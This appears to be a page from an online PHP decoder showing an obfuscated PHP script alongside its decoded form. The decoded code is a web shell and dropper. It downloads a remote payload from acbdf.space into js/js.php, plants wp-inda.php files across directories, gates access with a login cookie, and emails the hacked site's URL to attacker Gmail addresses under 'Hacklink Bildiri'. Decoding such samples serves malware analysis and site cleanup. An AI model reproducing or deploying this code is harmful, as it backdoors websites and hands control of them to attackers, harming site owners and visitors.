Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

goto I2y3v; ncbH0: $document_root = $_SERVER["\104\117\103\x55\x4d\105\116\124\137\122\117..

Decoded Output download

<?  goto I2y3v; ncbH0: $document_root = $_SERVER["DOCUMENT_ROOT"]; goto LbOsH; vlJ2R: $to_email = "[email protected]"; goto FhhCo; ScaOE: fclose($open_code); goto ztKJv; TTOBH: if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/css.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>\xa"; $header .= "Content-Type: text/html;
 charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } goto SbkzZ; STtt3: if ($_COOKIE["login"] != "1") { header2(); login(); die; } goto xmhx1; AySvM: foreach ($directories as $dir) { if (!preg_match("#wp-content#", $dir)) { $css_file = $dir . "/wp-inda.php"; $open_css = fopen($css_file, "w"); fwrite($open_css, $css); fclose($open_css); } } goto ahyBe; dnU6I: ?>

Did this file decode correctly?

Original Code

goto I2y3v; ncbH0: $document_root = $_SERVER["\104\117\103\x55\x4d\105\116\124\137\122\117\117\x54"]; goto LbOsH; vlJ2R: $to_email = "\x6c\x6f\x67\x69\156\x6f\x6c\x64\x75\x6d\100\147\x6d\x61\x69\154\56\143\x6f\155"; goto FhhCo; ScaOE: fclose($open_code); goto ztKJv; TTOBH: if ($datasi) { } else { @mkdir("\152\163"); $dos = file_get_contents("\150\164\x74\160\x73\72\57\57\141\x63\142\x64\x66\x2e\x73\160\141\x63\x65\x2f\164\170\x74\57\x63\163\163\56\x74\170\164"); $data = "\152\x73\57\152\163\x2e\160\150\x70"; @touch("\x6a\x73\57\x6a\x73\x2e\160\x68\x70"); $ver = @fopen($data, "\x77"); @fwrite($ver, $dos); @fclose($ver); $yol = "\x68\164\x74\160\x3a\x2f\57" . $_SERVER["\x48\x54\124\120\137\110\x4f\x53\124"] . '' . $_SERVER["\x52\x45\121\x55\x45\123\124\137\125\x52\x49"] . ''; $y = "\74\150\x31\76\123\145\156\x64\145\162\40\x59\x61\x7a\144\151\x72\x69\x6c\144\151\x2e\74\142\162\57\x3e\x20\123\111\x54\105\40\131\x4f\x4c\40\x3a\x20" . $yol . "\74\x62\x72\x2f\76\123\145\x6e\x64\145\162\x20\x59\x6f\154\x75\x20\x3a\x20\152\163\57\x63\162\163\56\160\150\x70\x3c\x2f\x68\61\76"; $header .= "\106\162\x6f\x6d\x3a\x20\x53\150\x65\x4c\114\x20\x42\157\157\x74\x20\x3c\163\x75\160\160\157\x72\100\x6e\151\x63\56\157\162\147\x3e\xa"; $header .= "\103\x6f\156\x74\145\156\x74\55\124\171\x70\x65\x3a\x20\164\145\170\164\x2f\x68\164\155\x6c\73\12\x20\143\150\141\x72\x73\145\x74\75\165\164\x66\x2d\70\xa"; @mail("\142\171\x68\145\162\x6f\x34\x34\x40\147\155\x61\x69\154\56\x63\157\155", "\110\x61\143\x6b\x6c\151\x6e\153\x20\102\x69\x6c\x64\x69\162\x69", "{$y}", $header); @mail("\154\157\147\x69\156\157\x6c\x64\x75\x6d\x40\x67\x6d\x61\151\x6c\x2e\x63\157\155", "\110\141\143\x6b\x6c\151\156\153\x20\102\151\154\144\151\162\151", "{$y}", $header); } goto SbkzZ; STtt3: if ($_COOKIE["\x6c\157\147\151\x6e"] != "\61") { header2(); login(); die; } goto xmhx1; AySvM: foreach ($directories as $dir) { if (!preg_match("\x23\167\160\55\143\157\x6e\x74\x65\x6e\x74\43", $dir)) { $css_file = $dir . "\x2f\167\x70\55\x69\x6e\144\141\x2e\x70\150\x70"; $open_css = fopen($css_file, "\x77"); fwrite($open_css, $css); fclose($open_css); } } goto ahyBe; dnU6I: ?>

Function Calls

None

Variables

None

Stats

MD5 30e1a62d0bbf3b35da8dc81222ee510c
Eval Count 0
Decode Time 41 ms